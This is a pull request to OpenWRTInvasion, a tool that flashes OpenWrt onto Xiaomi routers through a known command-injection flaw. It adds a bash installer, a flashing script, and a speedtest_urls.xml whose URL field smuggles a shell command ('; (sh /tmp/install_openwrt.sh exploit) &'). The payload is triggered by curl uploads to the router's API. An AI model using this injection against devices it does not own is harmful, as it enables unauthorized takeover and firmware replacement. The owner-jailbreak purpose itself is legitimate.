### PR TITLE
Simple bash script

### DIFF
--- a/README.md
+++ b/README.md
@@ -162,3 +162,11 @@ You can find solutions in the following links:
 ### Version 0.0.1: netcat (legacy)
 
 ![Alt Text](readme/exploit-001.gif)
+
+## A simple bash based version
+
+**TBD** this is in development and not yet tested. Use it if you know what are you doing.
+
+If you are on Windows and don't want to install Python you can try the plain shell script to install the OpenWrt.
+You still need bash and curl but it comes with Git by default.
+Open Bash shell and run: `bash ./setup_openwrt.bash`

--- a/extras/language/luci
+++ b/extras/language/luci
@@ -30,6 +30,3 @@ config internal 'ccache'
 config internal 'themes'
 	option xiaoqiang '/xiaoqiang'
 	option OpenWrt '/luci-static/openwrt.org'
-
-config 5 'debuglevel'
-

--- a/payload/install_openwrt.sh
+++ b/payload/install_openwrt.sh
@@ -1,0 +1,9 @@
+#!/bin/ash
+set -euo pipefail
+[ -f ./openwrt-squashfs-kernel1.bin ] || exit
+[ -f ./openwrt-squashfs-rootfs0.bin ] || exit
+mtd write openwrt-squashfs-kernel1.bin kernel1
+mtd write openwrt-squashfs-rootfs0.bin rootfs0
+nvram set flag_try_sys1_failed=1
+nvram commit
+reboot

--- a/payload/speedtest_urls.xml
+++ b/payload/speedtest_urls.xml
@@ -1,0 +1,32 @@
+﻿<?xml version="1.0"?>
+<root>
+	<class type="1">
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+		<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
+	</class>
+	<class type="2">
+		<item url="http://miwifi.com -q -O /dev/null;((sh /tmp/install_openwrt.sh exploit) &);exit;wget http://miwifi.com "/>
+	</class>
+	<class type="3">
+		<item uploadurl="http://www.taobao.com/"/>
+		<item uploadurl="http://www.so.com/"/>
+		<item uploadurl="http://www.qq.com/"/>
+		<item uploadurl="http://www.sohu.com/"/>
+		<item uploadurl="http://www.tudou.com/"/>
+		<item uploadurl="http://www.360doc.com/"/>
+		<item uploadurl="http://www.kankan.com/"/>
+		<item uploadurl="http://www.speedtest.cn/"/>
+	</class>
+</root>

--- a/remote_command_execution_vulnerability.py
+++ b/remote_command_execution_vulnerability.py
@@ -41,14 +41,14 @@ def get_stok(router_ip_address):
     try: 
         r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address))
     except:
-        print ("Xiaomi router not found...")
+        print ("Xiaomi router not found.")
         return None
-    try:	
+    try:
         mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
+        key = re.findall(r'key: \'(.*)\',', r0.text)[0]
     except:
-        print ("Xiaomi router not found...")
+        print ("Unable to find deviceId or key.")
         return None
-    key = re.findall(r'key: \'(.*)\',', r0.text)[0]
     nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
     router_password = input("Enter router admin password: ")
     account_str = hashlib.sha1((router_password + key).encode('utf-8')).hexdigest()

--- a/remote_command_execution_vulnerability.py
+++ b/remote_command_execution_vulnerability.py
@@ -67,8 +67,8 @@ def get_stok(router_ip_address):
 
 stok = get_stok(router_ip_address) or input("You need to get the stok manually, then input the stok here: ")
 print("""There two options to provide the files needed for invasion:
-   1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
-   2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)""")
+   1. Use a local TCP file server running on random port to provide files in local directory `script_tools`.
+   2. Download needed files from remote github repository. (choose this option only if github is accessible inside router device.)""")
 use_local_file_server = (input("Which option do you prefer? (default: 1)") or "1") == "1"
 
 # From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09

--- a/set_english.py
+++ b/set_english.py
@@ -9,12 +9,13 @@
 import os
 import ftplib
 
-router_ip_address = input("Router IP address: ")
-# router_ip_address = '192.168.0.21'
+router_ip_address = "miwifi.com"
+# router_ip_address = "192.168.31.1"
+router_ip_address = input("Router IP address: [press enter for using the default '{}']".format(router_ip_address)) or router_ip_address
 
 session = ftplib.FTP(router_ip_address,'root','')
 
-# Uploading a lenguage file will not succeed as the filesystem is ro
+# Uploading a language file will not succeed as the filesystem is ro
 # languageFile = open('extras/language/i18n/base.en.lmo','rb')
 # session.storbinary('STOR /usr/lib/lua/luci/i18n/base.en.lmo', languageFile)
 # languageFile.close()

--- a/setup_openwrt.bash
+++ b/setup_openwrt.bash
@@ -1,0 +1,51 @@
+#!/bin/bash
+set -euo pipefail
+echo "The script will install OpenWrt firmware on the Xiomi router."
+echo "First we need to download the OpenWrt for your router model."
+
+payload_dir=$(mktemp -d)
+echo "Files will be downloaded to $payload_dir"
+
+echo "Please select your model:"
+echo "1. Xiomi 3G v1 (with USB) https://openwrt.org/toh/xiaomi/mir3g"
+echo "2. Xiomi 3G v2 without USB https://openwrt.org/toh/xiaomi/mir3g"
+echo "Type a number:"
+read router_model
+case "$router_model" in
+  "1")
+    echo "Download openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g"
+    curl -L https://downloads.openwrt.org/releases/22.03.0/targets/ramips/mt7621/openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g-squashfs-kernel1.bin -o "$payload_dir/openwrt-squashfs-kernel1.bin" -z "$payload_dir/openwrt-squashfs-kernel1.bin"
+    curl -L https://downloads.openwrt.org/releases/22.03.0/targets/ramips/mt7621/openwrt-22.03.0-ramips-mt7621-xiaomi_mi-router-3g-squashfs-rootfs0.bin -o "$payload_dir/openwrt-squashfs-rootfs0.bin" -z "$payload_dir/openwrt-squashfs-rootfs0.bin"
+  ;;
+  "2")
+    echo "Not implemented yet, sorry"
+    exit 3
+  ;;
+  *)
+    echo "Your select is wrong"
+    exit 2
+esac
+
+echo "Prepare payload.tar.gz"
+cp ./payload/* "$payload_dir"
+(cd "$payload_dir" && tar -I "gzip -1" -cvf /tmp/payload.tar.gz ./)
+echo "The payload.tar.gz is ready for a shot:"
+ls -l /tmp/payload.tar.gz
+
+router_url="http://miwifi.com/cgi-bin/luci/;stok=04a76647de2b1d602d43cd131573f8ac/web/home#router"
+echo ""
+echo "Now let's install the firmware on the router."
+echo "Reset router to it's factory settings with a needle pushed into a Reset hole."
+echo "Then connect to it's WiFi and open your router admin panel at http://miwifi.com"
+echo "Now set admin and wifi passwords and you'll see a dashboard."
+echo "The URL in browser's address bar should look like $router_url"
+echo "Now copy and paste here it's URL:"
+read router_url
+# strip after stok
+router_base_url=( $(sed -e 's/\(.*stok=.*\)\/web\(.*\)/\1/' <<< "$router_url") )
+echo router_base_url
+curl -v -F 'image=@payload/payload.tar.gz' "$router_base_url/api/misystem/c_upload"
+curl -v "$router_base_url/api/xqnetdetect/netspeed"
+echo $?
+echo "Now the router should reboot itself. Please wait for a minute."
+echo "Try to connect with a cable and open OpenWrt Luci admin panel at http://192.168.1.1/"

--- a/tcp_file_server.py
+++ b/tcp_file_server.py
@@ -26,7 +26,7 @@ class TcpFileServer:
         self.server_thread = threading.Thread(target=self.server.serve_forever)
         self.server_thread.daemon = True
         self.server_thread.start()
-        print("local file server is runing on {}:{}. root='{}'".format(self.ip, self.port, self.server.root_dir))
+        print("local file server is running on {}:{}. root='{}'".format(self.ip, self.port, self.server.root_dir))
     
     def __exit__(self, exc_type, exc_val, exc_tb):
         self.server.shutdown()


### PR DESCRIPTION
The OpenWRTInvasion depends on Python which may be a problem for users on Windows.
Also it's many things are happening in the script which are not necessary.
I don't need to get a Telnet/SSH server on the router I just want to flush an OpenWrt on it.
So here is my version of a simple script: it will download OpenWrt images, prepare the payload.tar.gz, then it will ask for an URL of the router admin panel and will just POST the payload.
It's easier to understand and modify for most users. I didn't get how to install the OpenWrt by just reading the README and had to learn and modify it.

The bash and curl can be easier to install on Windows because they are installed with Git. Many users already have it.

Later we can port the script to PowerShell or .bat or bat to simplify life for users.
**UPD** Just found that someone already tried a Windows only installer:
https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition#microsoft_windows_installation_instructions_for_r4a_gigabit

I'll check it later but still my script looks valuable.
